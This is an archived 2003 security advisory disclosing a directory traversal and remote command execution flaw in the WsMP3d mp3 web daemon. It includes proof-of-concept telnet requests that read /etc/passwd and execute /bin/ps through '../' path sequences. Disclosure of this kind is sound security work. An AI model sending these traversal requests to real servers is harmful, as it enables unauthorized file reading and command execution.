Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!

TUCoPS :: Web :: Servers :: bt229.txt

WsMP3d Directory Traversal

	INetCop Security Advisory #2003-0x82-017.a

* Title: WsMP3d Directory Traversing Vulnerability

0x01. Description

WsMp3d is daemon that can enjoy mp3.
This daemon can approach in web, directory traversing bug exists.
Also, can execute command in remote.

0x02. Vulnerable Packages

Vendor site:

WsMp3-0.0.10.tar.gz version.
WsMp3-0.0.9.tar.gz version.
WsMp3-0.0.8.tar.gz version.
web_server-0.0.7.tar.gz version.
web_server-0.0.6.tar.gz version.
web_server-0.0.5.tar.gz version.
web_server-0.0.4.tar.gz version.
web_server-0.0.3.tar.gz version.
web_server-0.0.2.tar.gz version.
web_server-0.0.1.tar.gz version.

0x03. Exploit

#1) Directory traversing exploit:

As following, see file in directory.

In this way, use directory that know.

bash$ telnet 8000
Connected to
Escape character is '^]'.
GET /dir/../../../../../../etc/passwd HTTP/1.0

... passwd file here ...

Ok, it's possible to read `/etc/passwd' file !
If it's executed by root ?? hehehe ;-)

#2) Remote execute command exploit:

bash$ telnet 8000
Connected to
Escape character is '^]'.
POST /dir/../../../../../../bin/ps HTTP/1.0
HTTP/1.1 200 OK
Connection: close
Content-Type: text/html
Date: Sat May 03 01:25:28 2003
Last-Modified: Sat May 03 01:25:28 2003
Content-Length: 201

  PID TTY          TIME CMD
29529 pts/2    00:00:00 login
29559 pts/2    00:00:00 su
29560 pts/2    00:00:00 bash
29681 pts/2    00:00:10 WsMp3
29730 pts/2    00:00:00 WsMp3
29731 pts/2    00:00:00 ps
Connection closed by foreign host.

0x04. Patch

It can solve as chroot() function. :-)

P.S: Sorry, for my poor english.

By "dong-houn yoU" (Xpl017Elz), in INetCop(c) Security.

MSN & E-mail: szoahc(at)hotmail(dot)com,

INetCop Security Home: (Korean hacking game)
             My World: &

GPG public key:

Get your free email from

Powered by Outblaze

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH